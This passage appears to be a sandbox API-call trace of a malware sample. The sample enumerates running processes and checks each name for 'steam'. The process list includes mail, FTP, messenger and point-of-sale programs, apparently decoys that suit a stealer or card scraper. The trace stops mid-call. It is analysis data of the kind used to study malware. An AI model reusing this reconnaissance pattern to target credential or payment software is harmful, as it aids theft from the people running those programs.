[0099.299] StrStrIA (lpFirst="smartftp.exe", lpSrch="steam") returned 0x0 [0099.299] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0099.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0099.362] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x357bb38 [0099.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x357bb38, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0099.362] lstrcpyA (in: lpString1=0x567fabc, lpString2="thunderbird.exe" | out: lpString1="thunderbird.exe") returned="thunderbird.exe" [0099.362] StrStrIA (lpFirst="thunderbird.exe", lpSrch="steam") returned 0x0 [0099.362] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0099.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.364] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357ba78 [0099.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="totalcmd.exe", cchWideChar=-1, lpMultiByteStr=0x357ba78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="totalcmd.exe", lpUsedDefaultChar=0x0) returned 13 [0099.364] lstrcpyA (in: lpString1=0x567fabc, lpString2="totalcmd.exe" | out: lpString1="totalcmd.exe") returned="totalcmd.exe" [0099.364] StrStrIA (lpFirst="totalcmd.exe", lpSrch="steam") returned 0x0 [0099.364] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0099.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.365] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357baa8 [0099.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x357baa8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0099.365] lstrcpyA (in: lpString1=0x567fabc, lpString2="trillian.exe" | out: lpString1="trillian.exe") returned="trillian.exe" [0099.365] StrStrIA (lpFirst="trillian.exe", lpSrch="steam") returned 0x0 [0099.365] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0099.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.366] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357bac0 [0099.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x357bac0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0099.366] lstrcpyA (in: lpString1=0x567fabc, lpString2="webdrive.exe" | out: lpString1="webdrive.exe") returned="webdrive.exe" [0099.366] StrStrIA (lpFirst="webdrive.exe", lpSrch="steam") returned 0x0 [0099.366] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0099.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.368] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357bb68 [0099.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x357bb68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0099.368] lstrcpyA (in: lpString1=0x567fabc, lpString2="whatsapp.exe" | out: lpString1="whatsapp.exe") returned="whatsapp.exe" [0099.368] StrStrIA (lpFirst="whatsapp.exe", lpSrch="steam") returned 0x0 [0099.368] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0099.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.369] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357ba30 [0099.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x357ba30, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0099.369] lstrcpyA (in: lpString1=0x567fabc, lpString2="winscp.exe" | out: lpString1="winscp.exe") returned="winscp.exe" [0099.369] StrStrIA (lpFirst="winscp.exe", lpSrch="steam") returned 0x0 [0099.369] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0099.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0099.371] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357a4b8 [0099.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x357a4b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0099.371] lstrcpyA (in: lpString1=0x567fabc, lpString2="yahoomessenger.exe" | out: lpString1="yahoomessenger.exe") returned="yahoomessenger.exe" [0099.371] StrStrIA (lpFirst="yahoomessenger.exe", lpSrch="steam") returned 0x0 [0099.371] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xffc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0099.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0099.372] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357a538 [0099.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x357a538, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0099.372] lstrcpyA (in: lpString1=0x567fabc, lpString2="active-charge.exe" | out: lpString1="active-charge.exe") returned="active-charge.exe" [0099.372] StrStrIA (lpFirst="active-charge.exe", lpSrch="steam") returned 0x0 [0099.372] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0099.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.373] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357bbb0 [0099.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x357bbb0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0099.373] lstrcpyA (in: lpString1=0x567fabc, lpString2="accupos.exe" | out: lpString1="accupos.exe") returned="accupos.exe" [0099.373] StrStrIA (lpFirst="accupos.exe", lpSrch="steam") returned 0x0 [0099.373] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0099.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.375] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357bbc8 [0099.375] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x357bbc8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0099.375] lstrcpyA (in: lpString1=0x567fabc, lpString2="afr38.exe" | out: lpString1="afr38.exe") returned="afr38.exe" [0099.375] StrStrIA (lpFirst="afr38.exe", lpSrch="steam") returned 0x0 [0099.375] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0099.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.376] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357bbe0 [0099.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x357bbe0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0099.376] lstrcpyA (in: lpString1=0x567fabc, lpString2="aldelo.exe" | out: lpString1="aldelo.exe") returned="aldelo.exe" [0099.376] StrStrIA (lpFirst="aldelo.exe", lpSrch="steam") returned 0x0 [0099.376] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0099.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0099.378] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x357bbf8 [0099.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x357bbf8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0099.378] lstrcpyA (in: lpString1=0x567fabc, lpString2="ccv_server.exe" | out: lpString1="ccv_server.exe") returned="ccv_server.exe" [0099.378] StrStrIA (lpFirst="ccv_server.exe", lpSrch="steam") returned 0x0 [0099.378] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0099.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0099.379] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0x357a758 [0099.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x357a758, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0099.379] lstrcpyA (in: lpString1=0x567fabc, lpString2="centralcreditcard.exe" | out: lpString1="centralcreditcard.exe") returned="centralcreditcard.exe" [0099.379] StrStrIA (lpFirst="centralcreditcard.exe", lpSrch="steam") returned 0x0 [0099.379] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0099.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0099.381] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x357a598 [0099.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x357a598, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0099.381] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0099.381] StrStrIA (lpFirst="creditservice.exe", lpSrch="steam") returned 0x0 [0099.381] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0099.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.382] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357bad8 [0099.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x357bad8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0099.382] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0099.382] StrStrIA (lpFirst="edcsvr.exe", lpSrch="steam") returned 0x0 [0099.382] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0099.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0099.383] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357bc10 [0099.383] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x357bc10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0099.383] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0099.384] StrStrIA (lpFirst="fpos.exe", lpSrch="steam") returned 0x0 [0099.384] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0099.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.385] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357bc28 [0099.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x357bc28, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0099.385] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0099.385] StrStrIA (lpFirst="isspos.exe", lpSrch="steam") returned 0x0 [0099.385] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0099.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0099.386] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357a4d8 [0099.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x357a4d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0099.386] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0099.386] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="steam") returned 0x0 [0099.386] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0099.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.388] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357baf0 [0099.388] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x357baf0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0099.388] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0099.388] StrStrIA (lpFirst="omnipos.exe", lpSrch="steam") returned 0x0 [0099.388] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0099.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.389] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357bc40 [0099.389] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x357bc40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0099.389] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0099.389] StrStrIA (lpFirst="spcwin.exe", lpSrch="steam") returned 0x0 [0099.389] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0099.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0099.390] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x357a5b8 [0099.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x357a5b8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0099.390] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0099.391] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="steam") returned 0x0 [0099.391] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0099.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0099.392] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357bc70 [0099.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x357bc70, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0099.392] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0099.392] StrStrIA (lpFirst="utg2.exe", lpSrch="steam") returned 0x0 [0099.392] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0099.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.396] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357ba18 [0099.396] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x357ba18, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0099.396] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0099.396] StrStrIA (lpFirst="saying.exe", lpSrch="steam") returned 0x0 [0099.396] Process32NextW (in: 